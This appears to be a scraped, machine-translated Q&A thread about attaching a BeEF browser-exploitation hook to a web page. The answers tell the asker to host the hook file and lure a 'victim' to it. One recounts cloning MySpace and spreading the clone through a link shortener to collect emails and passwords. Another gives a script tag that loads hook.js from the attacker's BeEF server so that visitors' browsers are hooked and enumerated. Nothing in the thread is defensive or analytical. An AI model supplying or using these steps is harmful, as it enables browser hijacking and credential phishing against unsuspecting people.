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如何为页面设置 BeEF 挂钩

[英]How to set a BeEF hook to a page

I need to know how to set a BeEF hook to a page of my liking(an existing web page or a new custom page).我需要知道如何将 BeEF 挂钩设置到我喜欢的页面(现有的 web 页面或新的自定义页面)。 I tried sharing the demo page but only works on the hosting machine only.我尝试共享演示页面,但仅适用于主机。 I've looked for tutorials but couldn't find any.我一直在寻找教程,但找不到任何教程。 Please help!请帮忙!

I'm pretty sure You have to host the hook.html file on a hosting service Then direct the victim there.我很确定您必须在托管服务上托管 hook.html 文件然后将受害者引导到那里。 also need to edit the yml file.还需要编辑 yml 文件。 I remember back in the myspace days you could get on backtrack_r3, Load up setoolset and clone myspace.我记得在 myspace 时代,您可以在 backtrack_r3 上加载 setoolset 并克隆 myspace。

Then you uploaded that file on a file host service.然后,您将该文件上传到文件主机服务。 Make a stupid post with that link in a link shortener.在链接缩短器中使用该链接发布愚蠢的帖子。 Then tada you had emails and passwords.然后tada你有电子邮件和密码。

Using beef-xss you can generate hook.js.使用beef-xss 你可以生成hook.js。 Supposing that the target navigates the web page target.html, you shall include in that page:假设目标导航 web 页面 target.html,您应在该页面中包含:

<script src="http://<beef-xss-ip-address>:<beef-xss-port>/hook.js"></script>

Once your target will load target.html it will be hooked by beef-xss tool and you will be able to enumerate it.一旦你的目标将加载 target.html 它将被牛肉 xss 工具钩住,你将能够枚举它。

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